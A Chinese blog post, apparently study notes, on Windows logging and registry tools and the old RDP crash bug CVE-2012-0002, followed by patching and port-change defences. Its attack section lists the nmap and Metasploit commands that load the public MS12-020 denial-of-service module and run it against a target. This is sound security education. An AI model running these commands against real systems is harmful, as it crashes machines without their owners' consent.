645 字
3 分钟
Windows系统安全与CVE-2012-0002
2026-03-31
无标签

概述#

我觉得对于一个男生来说,这个绝对是非常神圣的时刻,但是玩多了,不知道原理或许也会感到麻木。不过安全无小事,还是有很多可以记录的。

Windows安全基础工具#

日志,这是一个必须要学会看的记录。这个记录会有系统所有的系统活动,包括登录,授权等信息,通过这些时间加上时间,就可以大致的推断出什么操作在什么时间影响了系统。

事件查看器#

打开方式很多,Win+R,eventvwr.msc

image-20260331203029398

可以根据里面的分类查找所需的日志。

注册表编辑器#

注册表是Windows所有设置,配置的存放的地方,自己使用肯定是能不碰绝对不去碰。不过对于服务器而言很多的设置在注册表里更改甚至比组策略编辑器还简单。打开方式,Win+R,regedit

image-20260331203401568

CVE-2012-0002#

问题出现地方,及受影响版本#

这个漏洞是出现在RDP远程桌面上。受影响Windows版本:

  • Windows XP SP2 / SP3(含 x64 Edition SP2)
  • Windows Server 2003 SP2
  • Windows Vista SP2
  • Windows Server 2008 SP2 / R2 / R2 SP1
  • Windows 7(RTM / SP1)

核心原理#

最近一段时间我在迁移家里的NAS,虚拟机数据就没有办法再多加,所以暂时没有办法去实操,但是不影响我找到这样的图片:

5-1615889707

里面清楚写明是Physical Memory Dump,也就是物理内存转存储,也就是内存爆了之后Windows对于数据保全的措施。

我大概了解了一下,Windows 的 RDP 有一个参数MaxChannelIds,用于控制连接的设备通道数量,Kali 的攻击修改了这个参数,导致 Windows 误以为需要很多通道,从而增加 RDP 的内存分配,但是内存又不够大,所以导致爆栈。为了抢救内存数据转移至存储,所以出现Physical Memory Dump的蓝屏提示。

攻击方法#

端口扫描#

Terminal window
nmap -p 3389 【目标IP】

使用Metasploit框架#

Terminal window
msfconsole

搜索漏洞#

Terminal window
search CVE-2012-0002

加载漏洞模块#

Terminal window
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

确定攻击主机IP#

Terminal window
set RHOSTS 【目标IP】

开始攻击#

Terminal window
run

防御#

安装补丁#

这个很简单,正常去微软官网都能够找到。

TIP

KB2621440

改为非标端口#

RDP协议的端口默认就是3389,但是更改后想要打你的成本也就会上去,所以改成非标端口就行。

打开注册表,定位:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp,修改PortNumber键值为十进制的非标端口数字即可。

Windows系统安全与CVE-2012-0002
https://ivoinkwell.xyz/posts/system-basics/windows-security-cve-2012-0002/
作者
Ivo
发布于
2026-03-31
许可协议
CC BY-NC-SA 4.0